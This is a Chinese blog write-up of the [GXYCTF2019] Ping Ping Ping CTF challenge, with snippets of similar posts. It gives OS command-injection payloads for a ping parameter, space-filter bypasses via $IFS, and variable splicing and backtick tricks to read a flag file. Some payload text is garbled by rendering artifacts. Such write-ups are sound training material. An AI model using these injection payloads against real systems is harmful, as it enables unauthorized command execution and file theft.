十、[GXYCTF2019]Ping Ping Ping

最新推荐文章于 2024-05-24 17:00:31 发布
最新推荐文章于 2024-05-24 17:00:31 发布
阅读量1.9k 收藏 1
点赞数
分类专栏: BUUOJ_Web_Writeup 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xiyuer_/article/details/121772429
版权

1.打开题目
在这里插入图片描述

2.题目分析
① 加上题目是ping ping ping
所以可以猜测是需要我们命令执行读取flag
加上?ip=127.0.0.1
在这里插入图片描述

②  可以看到页面成功返回,我们尝试使用管道符执行我们想要执行的命令
?ip=127.0.0.1 | ls
在这里插入图片描述

③ 怀疑是空格的原因,去掉空格,改为
在这里插入图片描述

④ 目录下存在flag.php和index.php文件,尝试cat flag文件
考虑到之前的空格会被检测,我们绕过空格
绕过空格的思路一般有:
   I F S     IFS    IFS  {IFS}
  $IFS$1 // 1 改 成 1改成 1加其他数字貌似都行
  <
  <>
  {cat,flag.php} //用逗号实现了空格功能
  %20
  %09
我们这里使用 I F S , 即 构 造 ? i p = 127.0.0.1 ∣ c a t IFS,即构造?ip=127.0.0.1|cat IFS?ip=127.0.0.1catIFSflag.php
不过页面显示的错误信息改变:
在这里插入图片描述

⑤ 猜测是因为检测了flag,所以我们尝试先读取index.php
?ip=127.0.0.1|cat I F S i n d e x . p h p , 还 是 没 有 显 示 结 果 , 依 次 尝 试 : ? i p = 127.0.0.1 ∣ c a t IFSindex.php,还是没有显示结果,依次尝试:?ip=127.0.0.1|cat IFSindex.php?ip=127.0.0.1catIFS$1index.php成功
在这里插入图片描述

可以看到对我们的输入进行了过滤,在flag贪婪匹配里面我们不将flag连着写,就不会匹配到,同时可以看到有 a 变 量 , 尝 试 覆 盖 它 ⑥   变 量 拼 接 ? i p = 127.0.0.1 ; a = g ; c a t a变量,尝试覆盖它 ⑥ 变量拼接 ?ip=127.0.0.1;a=g;cat a ?ip=127.0.0.1;a=g;catIFS 1 f l a 1fla 1flaa.php
查看源代码里面就有flag
在这里插入图片描述在这里插入图片描述

另外我们可以尝试使用反引号内联执行的做法,linux下反引号``里面包含的就是需要执行的系统命令
而反引号里面的系统命令会先执行,成功执行后将结果传递给调用它的命令
?ip=127.0.0.1;cat$IFSls
在这里插入图片描述在这里插入图片描述

3.获取flag
flag{7bb90144-e9c0-4ca8-8936-783423ae95c7}

囍语儿
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[buuoj][GXYCTF2019]Ping Ping Ping
qq_42250840的博客
07-07 354
知识点: linux的命令执行 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些 执行系统命令的函数。如果用户可以控制命令执行函数中的参数时, 就可以注入一些恶意的系统命令到正常命令,造成命令执行漏洞 绕过空格、敏感字符、连接符 复现: 尝试?ip=127.0.0.1;ls 找到flag.php、index.php 尝试访问: ?ip=127.0.0.1 ;cat flag.php 空格被过滤, 1.%20(space)、%09(tab)、$IFS$9、 IFS、{IFS} 2.使用&l
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5050
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
buuctf-Ping Ping Ping
m0_52432374的博客
03-13 514
buuctf-Ping Ping Ping 先尝试?ip=127.0.0.1&ls 发现不行 尝试?ip=127.0.0.1|ls,发现可以
CTF题目pingpingpongpong--获取flag
weixin_52937457的博客
03-17 1630
ctf获取flag入门
CTF wed安全(攻防世界)练习题_ctfweb题目
最新发布
Innocence_0的博客
05-24 414
进入网站如图:翻译:在这个小小的挑战训练中,你将学习Robots exclusionstandard。网络爬虫使用robots.txt文件来检查它们是否被允许抓取和索引您的网站或只是其中的一部分。有时这些文件会暴露目录结构,而不是保护内容不被抓取。好好享受吧!**步骤一:**进入robots.txt文件,如图:**步骤二:**得到/f10g.php,在进入这里面得到flag提交即可成功!!!
buu web:Ping Ping Ping(命令执行)
m0_55378150的博客
04-07 745
打开靶机,提示get传参 直接?ip=127.0.0.1 返回ping的结果,接着试一下命令执行?ip=127.0.0.1|ls 发现疑似flag的flag.php,试一下能不能直接读出来?ip=127.0.0.1|cat flag.php 果然没这么简单,空格被过滤了,百度了一下绕过的方法 cat flag.txt cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt 挨个试一下,发现..
CTF学习第二十一站——BUUCTF的pingpingping与Exec
qq_41174589的博客
10-26 152
做了半天做不出来查了一下才知道这是linux系统下运行的。用$IFS绕一下空格看看源码里都ban了些啥。ban了好多哎,符号都不能用了,拼接一下逝逝。没反应莫慌,flag在页面源代码里aw。先用堆叠注入看一看同目录下有什么东西。发现一个flag,用cat访问一下。可恶找不到一点,逝一逝cat。这边也是找到flag了。看来ban掉了一些东西。查一下同目录下的文件。
[GXYCTF2019]Ping Ping Ping
qq_48008847的博客
07-13 148
靶机打开是这样的 就ping一下本机 通了之后想到试一下管道符 想打开flag 想到可能是不让用空格用$IFS$1替换 还是不行就看一下index.php发现bash不能用flag也不能用就用base64编码 内联执行 ?ip=127.0.0.1;cat$IFS$1`ls` ...
LabVIEW实现网络Ping IP测试
07-10
在这个“LabVIEW实现网络Ping IP测试”的项目中,我们可以通过LabVIEW编写程序来模拟操作系统中的ping命令,对指定的IP地址进行连通性检测。 **一、LabVIEW基础知识** 1. **图形化编程**:LabVIEW采用G语言...
Linux批量pingIP地址
05-17
在Linux系统中,通过shell脚本读取IP列表,进行批量ping操作,并记录结果
Ping命令实现的扩充
09-27
实验内容:Ping命令实现的扩充,在给定的Ping程序的基础上做如下功能扩充: ? -h 显示帮助信息 ? -b 允许ping一个广播地址,只用于IPv4 ? -t 设置ttl值,只用于IPv4 ? -q 安静模式。不显示每个收到的包的分析结果,...
Labview ping IP.vi
01-07
通过程序来ping设备的IP地址,这样就可以确认当前设备是否已经正确连接到电脑。在连接设备之前可以判断
批量PingTelnet检测
12-25
批量Ping和Telnet检测是网络管理员常用的两种网络连通性检查工具,它们在IT领域中扮演着重要角色,尤其在大型网络环境中。批量检测能够大大提高工作效率,帮助快速定位网络问题。 **批量Ping检测** 批量Ping检测是...
BUUCTF之Ping Ping Ping
金 帛的博客
02-20 6672
BUUCTFWP,关于一些waf的绕过
BUUCTF系列 // [GXYCTF2019] Ping Ping Ping
qq_45805420的博客
10-01 342
前言 本题知识点:命令执行漏洞 WP 打开题目页面,提示很明显,那就先随便 ping 个 IP 地址看看效果 可以看到系统命令被正常执行了,有正确回显 接下来尝试一下是否存在命令执行漏洞,首先用 ls 试一试,看看有没有提示 flag 所在的位置 发现确实存在着命令执行,并且得到了新的线索 先试着直接用 cat 命令读取 flag.php 文件的内容 题目报了个错,(初看没太明白这个提示,后来结合其他的报错,意识到此处原因为空格被过滤了) 既然题目过滤了空格,那就用绕过试试呗 PS:命令执行漏洞,绕过
CTF利用工具探测尝试获取Flag
网站安全专家
03-04 4780
接下来咱们就使用攻击工具来探测一下靶场机器的这个服务信息。这里我们使用MFSV也就是探测服务端口,然后加上靶场的IP地址。下面我们回到kali linux进行探测。首先 Nmap -sv 192.168.213.10回车,这时候我们靶场机器,就被我们这kaili正在探测,探测还是比较快的,这里我们看到它开放了一些服务,比如说SSH服务以及HTTP服务,开放了两个HTTP服务。 这时候我们探测完毕,在探测结束之后,我们需要对探测结果进行分析,这里我们提前给大家说一个知识点,就是每一个服务对应计算机的一个
BUUCTF Web [GXYCTF2019]Ping Ping Ping
热门推荐
wangyuxiang946的博客
10-28 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [GXYCTF2019]Ping Ping Ping一、题目简介二、思路分析1)多命令执行2)绕过空格3)绕过flag三、解题步骤1)查看当前目录2)查看文件内容3)flag 在注释中四、总结 一、题目简介 进入连接后是一个「ping」的功能,参数 ip 传递的内容会被当做 ip.
Buuctf (Web)Ping Ping Ping
m0_64444909的博客
04-02 2720
文章目录一.解题步骤二、命令分隔符三.常见绕过方式 一.解题步骤 (1)页面里显示/?ip=,很明显要以ping的形式传一个参数给ip,并且我们要想执行其他命令,就要用命令分隔符也就是管道符连接,命令分隔符可以用";“”|“”&"三种,本题经过尝试发现第一步查看目录过滤了|,&和空格。 这里介绍两种方式: 1.ping本地127.0.0.1 2.用||来代替127.0.0.1; (2)虽然找到了放flag的文件,但是尝试后发现都不对,这里介绍一种思路,我们可以通过查看index.php

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值